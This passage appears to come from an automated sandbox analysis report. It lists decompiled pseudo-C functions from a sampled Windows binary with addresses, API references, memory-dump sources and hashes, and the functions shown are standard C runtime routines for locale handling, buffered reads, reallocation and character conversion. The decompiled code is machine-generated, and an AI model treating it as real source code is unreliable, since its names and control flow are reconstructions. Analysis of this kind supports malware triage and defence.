                                      				E0040563F( *((intOrPtr*)(_t39 + 0x6c)));
                                      				 *(_t40 - 4) = 0xfffffffe;
                                      				return E00402F05(E0040426E());
                                      			}







                                      0x004041c3
                                      0x004041c3
                                      0x004041c5
                                      0x004041ca
                                      0x004041d4
                                      0x004041da
                                      0x004041dd
                                      0x004041e4
                                      0x004041eb
                                      0x004041ee
                                      0x004041f1
                                      0x004041f8
                                      0x004041ff
                                      0x00404208
                                      0x0040420e
                                      0x00404215
                                      0x0040421b
                                      0x00404222
                                      0x00404229
                                      0x0040422f
                                      0x00404232
                                      0x00404235
                                      0x0040423a
                                      0x0040423c
                                      0x00404241
                                      0x00404241
                                      0x00404247
                                      0x0040424d
                                      0x0040425e

                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0040ADC0,00000008,004042CB,00000000,00000000,?,00401038,?,00409378), ref: 004041D4
                                      • __lock.LIBCMT ref: 00404208
                                        • Part of subcall function 0040629E: __mtinitlocknum.LIBCMT ref: 004062B4
                                        • Part of subcall function 0040629E: __amsg_exit.LIBCMT ref: 004062C0
                                        • Part of subcall function 0040629E: EnterCriticalSection.KERNEL32(?,?,?,0040420D,0000000D), ref: 004062C8
                                      • InterlockedIncrement.KERNEL32(0040C578), ref: 00404215
                                      • __lock.LIBCMT ref: 00404229
                                      • ___addlocaleref.LIBCMT ref: 00404247
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.957134407.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000008.00000002.957101736.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957143775.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957150990.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                      • String ID: KERNEL32.DLL
                                      • API String ID: 637971194-2576044830
                                      • Opcode ID: 9368804bd3479670163917d4ae4201fb94beba0c7f6118466ca6f312f96598b5
                                      • Instruction ID: d428de3b8589a0431686e7cb1a02ea656415c747b6556e04c479c792043df686
                                      • Opcode Fuzzy Hash: 9368804bd3479670163917d4ae4201fb94beba0c7f6118466ca6f312f96598b5
                                      • Instruction Fuzzy Hash: FC018E71440B00EED720AF66D909709FBE0AF80324F10896FE496732E1CBB8AA40CB19
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 81%
                                      			E0040517E(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                      				signed int _t15;
                                      				LONG* _t21;
                                      				void* _t31;
                                      				LONG* _t33;
                                      				void* _t34;
                                      				void* _t35;
                                      
                                      				_t35 = __eflags;
                                      				_t29 = __edx;
                                      				_t25 = __ebx;
                                      				_push(0xc);
                                      				_push(0x40ae30);
                                      				E00402EC0(__ebx, __edi, __esi);
                                      				_t31 = E004042F0(__ebx, __edx, _t35);
                                      				_t15 =  *0x40ca98; // 0xfffffffe
                                      				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                      					E0040629E(_t25, _t31, 0xd);
                                      					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                      					_t33 =  *(_t31 + 0x68);
                                      					 *(_t34 - 0x1c) = _t33;
                                      					__eflags = _t33 -  *0x40c9a0; // 0x2c1a00
                                      					if(__eflags != 0) {
                                      						__eflags = _t33;
                                      						if(__eflags != 0) {
                                      							__eflags = InterlockedDecrement(_t33);
                                      							if(__eflags == 0) {
                                      								__eflags = _t33 - 0x40c578;
                                      								if(__eflags != 0) {
                                      									E004012B0(_t33);
                                      								}
                                      							}
                                      						}
                                      						_t21 =  *0x40c9a0; // 0x2c1a00
                                      						 *(_t31 + 0x68) = _t21;
                                      						_t33 =  *0x40c9a0; // 0x2c1a00
                                      						 *(_t34 - 0x1c) = _t33;
                                      						InterlockedIncrement(_t33);
                                      					}
                                      					 *(_t34 - 4) = 0xfffffffe;
                                      					E00405219();
                                      				} else {
                                      					_t33 =  *(_t31 + 0x68);
                                      				}
                                      				_t38 = _t33;
                                      				if(_t33 == 0) {
                                      					_push(0x20);
                                      					E0040223C(_t29, _t38);
                                      				}
                                      				return E00402F05(_t33);
                                      			}









                                      0x0040517e
                                      0x0040517e
                                      0x0040517e
                                      0x0040517e
                                      0x00405180
                                      0x00405185
                                      0x0040518f
                                      0x00405191
                                      0x00405199
                                      0x004051ba
                                      0x004051c0
                                      0x004051c4
                                      0x004051c7
                                      0x004051ca
                                      0x004051d0
                                      0x004051d2
                                      0x004051d4
                                      0x004051dd
                                      0x004051df
                                      0x004051e1
                                      0x004051e7
                                      0x004051ea
                                      0x004051ef
                                      0x004051e7
                                      0x004051df
                                      0x004051f0
                                      0x004051f5
                                      0x004051f8
                                      0x004051fe
                                      0x00405202
                                      0x00405202
                                      0x00405208
                                      0x0040520f
                                      0x004051a1
                                      0x004051a1
                                      0x004051a1
                                      0x004051a4
                                      0x004051a6
                                      0x004051a8
                                      0x004051aa
                                      0x004051af
                                      0x004051b7

                                      APIs
                                      • __getptd.LIBCMT ref: 0040518A
                                        • Part of subcall function 004042F0: __getptd_noexit.LIBCMT ref: 004042F3
                                        • Part of subcall function 004042F0: __amsg_exit.LIBCMT ref: 00404300
                                      • __amsg_exit.LIBCMT ref: 004051AA
                                      • __lock.LIBCMT ref: 004051BA
                                      • InterlockedDecrement.KERNEL32(?), ref: 004051D7
                                      • _free.LIBCMT ref: 004051EA
                                      • InterlockedIncrement.KERNEL32(002C1A00), ref: 00405202
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.957134407.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000008.00000002.957101736.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957143775.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957150990.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                      • String ID:
                                      • API String ID: 3470314060-0
                                      • Opcode ID: 9e3d08d9d8b8cbccd9aa46752a9a02badfb21c37146b35ec9e066227df42940b
                                      • Instruction ID: 61f947c996ca1a67885c84a75fe1426d65295c5a16dda6521d063a9dc6fb5bb1
                                      • Opcode Fuzzy Hash: 9e3d08d9d8b8cbccd9aa46752a9a02badfb21c37146b35ec9e066227df42940b
                                      • Instruction Fuzzy Hash: F4017931D41A22EBDA21AB65994974B7360AF04754F45027FE800BB2D2CB7C6841DFDE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 97%
                                      			E0040142B(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
                                      				signed int _v8;
                                      				char* _v12;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* __ebp;
                                      				signed int _t82;
                                      				char _t89;
                                      				signed int _t96;
                                      				signed int _t98;
                                      				signed int _t101;
                                      				signed int _t104;
                                      				signed int _t108;
                                      				signed int _t109;
                                      				char* _t110;
                                      				signed int _t120;
                                      				signed int _t123;
                                      				signed int _t124;
                                      				signed int _t125;
                                      				signed int _t126;
                                      				void* _t127;
                                      
                                      				_t110 = _a4;
                                      				_t108 = _a8;
                                      				_t123 = _a12;
                                      				_v12 = _t110;
                                      				_v8 = _t108;
                                      				if(_t123 == 0 || _a16 == 0) {
                                      					L5:
                                      					return 0;
                                      				} else {
                                      					_t131 = _t110;
                                      					if(_t110 != 0) {
                                      						_t126 = _a20;
                                      						__eflags = _t126;
                                      						if(_t126 == 0) {
                                      							L9:
                                      							__eflags = _t108 - 0xffffffff;
                                      							if(_t108 != 0xffffffff) {
                                      								_t82 = E00401A70(_t110, 0, _t108);
                                      								_t127 = _t127 + 0xc;
                                      							}
                                      							__eflags = _t126;
                                      							if(__eflags == 0) {
                                      								goto L3;
                                      							} else {
                                      								__eflags = _a16 - (_t82 | 0xffffffff) / _t123;
                                      								if(__eflags > 0) {
                                      									goto L3;
                                      								}
                                      								L13:
                                      								_t124 = _t123 * _a16;
                                      								__eflags =  *(_t126 + 0xc) & 0x0000010c;
                                      								_v20 = _t124;
                                      								_t109 = _t124;
                                      								if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                                      									_v16 = 0x1000;
                                      								} else {
                                      									_v16 =  *((intOrPtr*)(_t126 + 0x18));
                                      								}
                                      								__eflags = _t124;
                                      								if(_t124 == 0) {
                                      									L40:
                                      									return _a16;
                                      								} else {
                                      									do {
                                      										__eflags =  *(_t126 + 0xc) & 0x0000010c;
                                      										if(( *(_t126 + 0xc) & 0x0000010c) == 0) {
                                      											L24:
                                      											__eflags = _t109 - _v16;
                                      											if(_t109 < _v16) {
                                      												_t89 = E0040249F(_t109, _t124, _t126);
                                      												__eflags = _t89 - 0xffffffff;
                                      												if(_t89 == 0xffffffff) {
                                      													L45:
                                      													return (_t124 - _t109) / _a12;
                                      												}
                                      												__eflags = _v8;
                                      												if(_v8 == 0) {
                                      													L41:
                                      													__eflags = _a8 - 0xffffffff;
                                      													if(__eflags != 0) {
                                      														E00401A70(_a4, 0, _a8);
                                      													}
                                      													 *((intOrPtr*)(E00401E66(__eflags))) = 0x22;
                                      													L4:
                                      													E00401E14();
                                      													goto L5;
                                      												}
                                      												_v12 = _v12 + 1;
                                      												 *_v12 = _t89;
                                      												_t109 = _t109 - 1;
                                      												_t65 =  &_v8;
                                      												 *_t65 = _v8 - 1;
                                      												__eflags =  *_t65;
                                      												_v16 =  *((intOrPtr*)(_t126 + 0x18));
                                      												goto L39;
                                      											}
                                      											__eflags = _v16;
                                      											if(_v16 == 0) {
                                      												_t96 = 0x7fffffff;
                                      												__eflags = _t109 - 0x7fffffff;
                                      												if(_t109 <= 0x7fffffff) {
                                      													_t96 = _t109;
                                      												}
                                      											} else {
                                      												__eflags = _t109 - 0x7fffffff;
                                      												if(_t109 <= 0x7fffffff) {
                                      													_t50 = _t109 % _v16;
                                      													__eflags = _t50;
                                      													_t120 = _t50;
                                      													_t101 = _t109;
                                      												} else {
                                      													_t120 = 0x7fffffff % _v16;
                                      													_t101 = 0x7fffffff;
                                      												}
                                      												_t96 = _t101 - _t120;
                                      											}
                                      											__eflags = _t96 - _v8;
                                      											if(_t96 > _v8) {
                                      												goto L41;
                                      											} else {
                                      												_push(_t96);
                                      												_push(_v12);
                                      												_push(E00402C6E(_t126));
                                      												_t98 = E00402B78(_t109, _t124, _t126, __eflags);
                                      												_t127 = _t127 + 0xc;
                                      												__eflags = _t98;
                                      												if(_t98 == 0) {
                                      													 *(_t126 + 0xc) =  *(_t126 + 0xc) | 0x00000010;
                                      													goto L45;
                                      												}
                                      												__eflags = _t98 - 0xffffffff;
                                      												if(_t98 == 0xffffffff) {
                                      													L44:
                                      													_t72 = _t126 + 0xc;
                                      													 *_t72 =  *(_t126 + 0xc) | 0x00000020;
                                      													__eflags =  *_t72;
                                      													goto L45;
                                      												}
                                      												_v12 = _v12 + _t98;
                                      												_t109 = _t109 - _t98;
                                      												_v8 = _v8 - _t98;
                                      												goto L39;
                                      											}
                                      										}
                                      										_t104 =  *(_t126 + 4);
                                      										__eflags = _t104;
                                      										if(__eflags == 0) {
                                      											goto L24;
                                      										}
                                      										if(__eflags < 0) {
                                      											goto L44;
                                      										}
                                      										_t125 = _t109;
                                      										__eflags = _t109 - _t104;
                                      										if(_t109 >= _t104) {
                                      											_t125 = _t104;
                                      										}
                                      										__eflags = _t125 - _v8;
                                      										if(_t125 > _v8) {
                                      											goto L41;
                                      										} else {
                                      											E00402C94(_v12, _v8,  *_t126, _t125);
                                      											 *(_t126 + 4) =  *(_t126 + 4) - _t125;
                                      											 *_t126 =  *_t126 + _t125;
                                      											_v12 = _v12 + _t125;
                                      											_t109 = _t109 - _t125;
                                      											_t127 = _t127 + 0x10;
                                      											_v8 = _v8 - _t125;
                                      											_t124 = _v20;
                                      										}
                                      										L39:
                                      										__eflags = _t109;
                                      									} while (_t109 != 0);
                                      									goto L40;
                                      								}
                                      							}
                                      						}
                                      						_t82 = (_t82 | 0xffffffff) / _t123;
                                      						__eflags = _a16 - _t82;
                                      						if(_a16 <= _t82) {
                                      							goto L13;
                                      						}
                                      						goto L9;
                                      					}
                                      					L3:
                                      					 *((intOrPtr*)(E00401E66(_t131))) = 0x16;
                                      					goto L4;
                                      				}
                                      			}


























                                      0x00401433
                                      0x00401437
                                      0x0040143c
                                      0x0040143f
                                      0x00401442
                                      0x00401447
                                      0x00401463
                                      0x00000000
                                      0x0040144f
                                      0x0040144f
                                      0x00401451
                                      0x0040146a
                                      0x0040146d
                                      0x0040146f
                                      0x0040147d
                                      0x0040147d
                                      0x00401480
                                      0x00401486
                                      0x0040148b
                                      0x0040148b
                                      0x0040148e
                                      0x00401490
                                      0x00000000
                                      0x00401492
                                      0x00401499
                                      0x0040149c
                                      0x00000000
                                      0x00000000
                                      0x0040149e
                                      0x0040149e
                                      0x004014a2
                                      0x004014a9
                                      0x004014ac
                                      0x004014ae
                                      0x004014b8
                                      0x004014b0
                                      0x004014b3
                                      0x004014b3
                                      0x004014bf
                                      0x004014c1
                                      0x004015a1
                                      0x00000000
                                      0x004014c7
                                      0x004014c7
                                      0x004014c7
                                      0x004014ce
                                      0x00401514
                                      0x00401514
                                      0x00401517
                                      0x00401576
                                      0x0040157c
                                      0x0040157f
                                      0x004015d3
                                      0x00000000
                                      0x004015d9
                                      0x00401581
                                      0x00401585
                                      0x004015a9
                                      0x004015a9
                                      0x004015ad
                                      0x004015b7
                                      0x004015bc
                                      0x004015c4
                                      0x0040145e
                                      0x0040145e
                                      0x00000000
                                      0x0040145e
                                      0x0040158a
                                      0x0040158d
                                      0x00401592
                                      0x00401593
                                      0x00401593
                                      0x00401593
                                      0x00401596
                                      0x00000000
                                      0x00401596
                                      0x00401519
                                      0x0040151d
                                      0x0040153e
                                      0x00401543
                                      0x00401545
                                      0x00401547
                                      0x00401547
                                      0x0040151f
                                      0x00401526
                                      0x00401528
                                      0x00401535
                                      0x00401535
                                      0x00401535
                                      0x00401538
                                      0x0040152a
                                      0x0040152c
                                      0x0040152f
                                      0x0040152f
                                      0x0040153a
                                      0x0040153a
                                      0x00401549
                                      0x0040154c
                                      0x00000000
                                      0x0040154e
                                      0x0040154e
                                      0x0040154f
                                      0x00401559
                                      0x0040155a
                                      0x0040155f
                                      0x00401562
                                      0x00401564
                                      0x004015e1
                                      0x00000000
                                      0x004015e1
                                      0x00401566
                                      0x00401569
                                      0x004015cf
                                      0x004015cf
                                      0x004015cf
                                      0x004015cf
                                      0x00000000
                                      0x004015cf
                                      0x0040156b
                                      0x0040156e
                                      0x00401570
                                      0x00000000
                                      0x00401570
                                      0x0040154c
                                      0x004014d0
                                      0x004014d3
                                      0x004014d5
                                      0x00000000
                                      0x00000000
                                      0x004014d7
                                      0x00000000
                                      0x00000000
                                      0x004014dd
                                      0x004014df
                                      0x004014e1
                                      0x004014e3
                                      0x004014e3
                                      0x004014e5
                                      0x004014e8
                                      0x00000000
                                      0x004014ee
                                      0x004014f7
                                      0x004014fc
                                      0x004014ff
                                      0x00401501
                                      0x00401504
                                      0x00401506
                                      0x00401509
                                      0x0040150c
                                      0x0040150c
                                      0x00401599
                                      0x00401599
                                      0x00401599
                                      0x00000000
                                      0x004014c7
                                      0x004014c1
                                      0x00401490
                                      0x00401476
                                      0x00401478
                                      0x0040147b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0040147b
                                      0x00401453
                                      0x00401458
                                      0x00000000
                                      0x00401458

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.957134407.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000008.00000002.957101736.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957143775.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957150990.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                      • String ID:
                                      • API String ID: 4048096073-0
                                      • Opcode ID: 0cd08acd97a4d25d2423ee29e9a75b44744814a9ce64f5da55171a435f6764df
                                      • Instruction ID: 7a080fabcb58439197a1708b88f97224dc043be32e8d8de740e80110cf7f810b
                                      • Opcode Fuzzy Hash: 0cd08acd97a4d25d2423ee29e9a75b44744814a9ce64f5da55171a435f6764df
                                      • Instruction Fuzzy Hash: DC51A871A00204EBDB249F79CD4469EB7B5AF80314F24823BE8267B2F0D7789E51DB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 94%
                                      			E0040137E(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
                                      				void* _t7;
                                      				long _t8;
                                      				intOrPtr* _t9;
                                      				intOrPtr* _t12;
                                      				long _t27;
                                      				long _t30;
                                      
                                      				if(_a4 != 0) {
                                      					_push(__esi);
                                      					_t30 = _a8;
                                      					__eflags = _t30;
                                      					if(_t30 != 0) {
                                      						_push(__edi);
                                      						while(1) {
                                      							__eflags = _t30 - 0xffffffe0;
                                      							if(_t30 > 0xffffffe0) {
                                      								break;
                                      							}
                                      							__eflags = _t30;
                                      							if(_t30 == 0) {
                                      								_t30 = _t30 + 1;
                                      								__eflags = _t30;
                                      							}
                                      							_t7 = HeapReAlloc( *0x40cfc4, 0, _a4, _t30);
                                      							_t27 = _t7;
                                      							__eflags = _t27;
                                      							if(_t27 != 0) {
                                      								L17:
                                      								_t8 = _t27;
                                      							} else {
                                      								__eflags =  *0x40d62c - _t7;
                                      								if(__eflags == 0) {
                                      									_t9 = E00401E66(__eflags);
                                      									 *_t9 = E00401E24(GetLastError());
                                      									goto L17;
                                      								} else {
                                      									__eflags = E00402477(_t7, _t30);
                                      									if(__eflags == 0) {
                                      										_t12 = E00401E66(__eflags);
                                      										 *_t12 = E00401E24(GetLastError());
                                      										L12:
                                      										_t8 = 0;
                                      										__eflags = 0;
                                      									} else {
                                      										continue;
                                      									}
                                      								}
                                      							}
                                      							goto L14;
                                      						}
                                      						E00402477(_t6, _t30);
                                      						 *((intOrPtr*)(E00401E66(__eflags))) = 0xc;
                                      						goto L12;
                                      					} else {
                                      						E004012B0(_a4);
                                      						_t8 = 0;
                                      					}
                                      					L14:
                                      					return _t8;
                                      				} else {
                                      					return E004012EA(__edx, __edi, __esi, _a8);
                                      				}
                                      			}









                                      0x00401387
                                      0x00401394
                                      0x00401395
                                      0x00401398
                                      0x0040139a
                                      0x004013a9
                                      0x004013dc
                                      0x004013dc
                                      0x004013df
                                      0x00000000
                                      0x00000000
                                      0x004013ac
                                      0x004013ae
                                      0x004013b0
                                      0x004013b0
                                      0x004013b0
                                      0x004013bd
                                      0x004013c3
                                      0x004013c5
                                      0x004013c7
                                      0x00401427
                                      0x00401427
                                      0x004013c9
                                      0x004013c9
                                      0x004013cf
                                      0x00401411
                                      0x00401425
                                      0x00000000
                                      0x004013d1
                                      0x004013d8
                                      0x004013da
                                      0x004013f9
                                      0x0040140d
                                      0x004013f3
                                      0x004013f3
                                      0x004013f3
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004013da
                                      0x004013cf
                                      0x00000000
                                      0x004013f5
                                      0x004013e2
                                      0x004013ed
                                      0x00000000
                                      0x0040139c
                                      0x0040139f
                                      0x004013a5
                                      0x004013a5
                                      0x004013f6
                                      0x004013f8
                                      0x00401389
                                      0x00401393
                                      0x00401393

                                      APIs
                                      • _malloc.LIBCMT ref: 0040138C
                                        • Part of subcall function 004012EA: __FF_MSGBANNER.LIBCMT ref: 00401303
                                        • Part of subcall function 004012EA: __NMSG_WRITE.LIBCMT ref: 0040130A
                                        • Part of subcall function 004012EA: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004059AC,?,00000001,?,?,00406229,00000018,0040AE90,0000000C,004062B9), ref: 0040132F
                                      • _free.LIBCMT ref: 0040139F
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.957134407.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000008.00000002.957101736.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957143775.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957150990.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: AllocHeap_free_malloc
                                      • String ID:
                                      • API String ID: 2734353464-0
                                      • Opcode ID: 43ddb7a184c6da373f4c0bf6b210ad168dbc7d24905898b017241f79401b3c70
                                      • Instruction ID: d24a7906eaa927bdfab9682e7e9c0c1dd222746acacd840904e66b7a229e9837
                                      • Opcode Fuzzy Hash: 43ddb7a184c6da373f4c0bf6b210ad168dbc7d24905898b017241f79401b3c70
                                      • Instruction Fuzzy Hash: 67119432904611ABEB212B75E905A9F3694DB443A4F20453FFC48BA6F1DB3D8C41979D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 78%
                                      			E004058FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                      				signed int _t12;
                                      				void* _t28;
                                      				intOrPtr _t29;
                                      				void* _t30;
                                      				void* _t31;
                                      
                                      				_t31 = __eflags;
                                      				_t26 = __edi;
                                      				_t25 = __edx;
                                      				_t20 = __ebx;
                                      				_push(0xc);
                                      				_push(0x40ae70);
                                      				E00402EC0(__ebx, __edi, __esi);
                                      				_t28 = E004042F0(__ebx, __edx, _t31);
                                      				_t12 =  *0x40ca98; // 0xfffffffe
                                      				if(( *(_t28 + 0x70) & _t12) == 0) {
                                      					L6:
                                      					E0040629E(_t20, _t26, 0xc);
                                      					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                      					_t29 = _t28 + 0x6c;
                                      					 *((intOrPtr*)(_t30 - 0x1c)) = E004058B2(_t29,  *0x40cce0);
                                      					 *(_t30 - 4) = 0xfffffffe;
                                      					E0040596C();
                                      				} else {
                                      					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
                                      					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                      						goto L6;
                                      					} else {
                                      						_t29 =  *((intOrPtr*)(E004042F0(_t20, __edx, _t33) + 0x6c));
                                      					}
                                      				}
                                      				_t34 = _t29;
                                      				if(_t29 == 0) {
                                      					_push(0x20);
                                      					E0040223C(_t25, _t34);
                                      				}
                                      				return E00402F05(_t29);
                                      			}








                                      0x004058ff
                                      0x004058ff
                                      0x004058ff
                                      0x004058ff
                                      0x004058ff
                                      0x00405901
                                      0x00405906
                                      0x00405910
                                      0x00405912
                                      0x0040591a
                                      0x0040593e
                                      0x00405940
                                      0x00405946
                                      0x00405950
                                      0x0040595b
                                      0x0040595e
                                      0x00405965
                                      0x0040591c
                                      0x0040591c
                                      0x00405920
                                      0x00000000
                                      0x00405922
                                      0x00405927
                                      0x00405927
                                      0x00405920
                                      0x0040592a
                                      0x0040592c
                                      0x0040592e
                                      0x00405930
                                      0x00405935
                                      0x0040593d

                                      APIs
                                      • __getptd.LIBCMT ref: 0040590B
                                        • Part of subcall function 004042F0: __getptd_noexit.LIBCMT ref: 004042F3
                                        • Part of subcall function 004042F0: __amsg_exit.LIBCMT ref: 00404300
                                      • __getptd.LIBCMT ref: 00405922
                                      • __amsg_exit.LIBCMT ref: 00405930
                                      • __lock.LIBCMT ref: 00405940
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00405954
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.957134407.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000008.00000002.957101736.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957143775.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000008.00000002.957150990.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: 31437981d7cea4519be4af5e9366cedaf90d851205a86ad2be68fc1ec5807629
                                      • Instruction ID: 672b8ff66245b7122317208c76101a1feb13e167aa3bf42c285fe57ecdeaa840
                                      • Opcode Fuzzy Hash: 31437981d7cea4519be4af5e9366cedaf90d851205a86ad2be68fc1ec5807629
                                      • Instruction Fuzzy Hash: 06F06272940B00DAE720BBA9950670F33A0AF00764F11417FF845762D2CBBC59509E9E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00405B0B(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                      				char _v8;
                                      				signed int _v12;
                                      				char _v20;
                                      				char _t43;
                                      				char _t46;
                                      				signed int _t53;
                                      				signed int _t54;
                                      				intOrPtr _t56;
                                      				intOrPtr _t57;
                                      				int _t58;
                                      				char _t59;
                                      				short* _t60;
                                      				int _t65;
                                      				char* _t73;
                                      
                                      				_t73 = _a8;
                                      				if(_t73 == 0 || _a12 == 0) {
                                      					L5:
                                      					return 0;
                                      				} else {
                                      					if( *_t73 != 0) {
                                      						E00401EAF( &_v20, __edi, _a16);
                                      						_t43 = _v20;
                                      						__eflags =  *(_t43 + 0x14);
                                      						if( *(_t43 + 0x14) != 0) {
                                      							_t46 = E00405C3B( *_t73 & 0x000000ff,  &_v20);
                                      							__eflags = _t46;
                                      							if(_t46 == 0) {
                                      								__eflags = _a4;
                                      								_t40 = _v20 + 4; // 0x840ffff8
                                      								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                                      								if(__eflags != 0) {
                                      									L10:
                                      									__eflags = _v8;
                                      									if(_v8 != 0) {
                                      										_t53 = _v12;
                                      										_t11 = _t53 + 0x70;
                                      										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                      										__eflags =  *_t11;
                                      									}
                                      									return 1;
                                      								}
                                      								L21:
                                      								_t54 = E00401E66(__eflags);
                                      								 *_t54 = 0x2a;
                                      								__eflags = _v8;
                                      								if(_v8 != 0) {
                                      									_t54 = _v12;
                                      									_t33 = _t54 + 0x70;
                                      									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                      									__eflags =  *_t33;
                                      								}
                                      								return _t54 | 0xffffffff;
                                      							}
                                      							_t56 = _v20;
                                      							_t15 = _t56 + 0xac; // 0x50036acc
                                      							_t65 =  *_t15;
                                      							__eflags = _t65 - 1;
                                      							if(_t65 <= 1) {
                                      								L17:
                                      								_t24 = _t56 + 0xac; // 0x50036acc
                                      								__eflags = _a12 -  *_t24;
                                      								if(__eflags < 0) {
                                      									goto L21;
                                      								}
                                      								__eflags = _t73[1];
                                      								if(__eflags == 0) {
                                      									goto L21;
                                      								}
                                      								L19:
                                      								_t26 = _t56 + 0xac; // 0x50036acc
                                      								_t57 =  *_t26;
                                      								__eflags = _v8;
                                      								if(_v8 == 0) {
                                      									return _t57;
                                      								}
                                      								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                      								return _t57;
                                      							}
                                      							__eflags = _a12 - _t65;
                                      							if(_a12 < _t65) {
                                      								goto L17;
                                      							}
                                      							__eflags = _a4;
                                      							_t21 = _t56 + 4; // 0x840ffff8
                                      							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                                      							__eflags = _t58;
                                      							_t56 = _v20;
                                      							if(_t58 != 0) {
                                      								goto L19;
                                      							}
                                      							goto L17;
                                      						}
                                      						_t59 = _a4;
                                      						__eflags = _t59;
                                      						if(_t59 != 0) {
                                      							 *_t59 =  *_t73 & 0x000000ff;
                                      						}
                                      						goto L10;
                                      					} else {
                                      						_t60 = _a4;
                                      						if(_t60 != 0) {
                                      							 *_t60 = 0;
                                      						}
                                      						goto L5;
                                      					}
                                      				}
                                      			}

















                                      0x00405b15
                                      0x00405b1c
                                      0x00405b33
                                      0x00000000
                                      0x00405b23
                                      0x00405b25
                                      0x00405b3f
                                      0x00405b44
                                      0x00405b47
                                      0x00405b4a
                                      0x00405b72
                                      0x00405b79
                                      0x00405b7b
                                      0x00405bfc
                                      0x00405c0e
                                      0x00405c17
                                      0x00405c19
                                      0x00405b59
                                      0x00405b59
                                      0x00405b5c
                                      0x00405b5e
                                      0x00405b61
                                      0x00405b61
                                      0x00405b61
                                      0x00405b61
                                      0x00000000
                                      0x00405b67
                                      0x00405bdb
                                      0x00405bdb
                                      0x00405be0
                                      0x00405be6
                                      0x00405be9
                                      0x00405beb
                                      0x00405bee
                                      0x00405bee
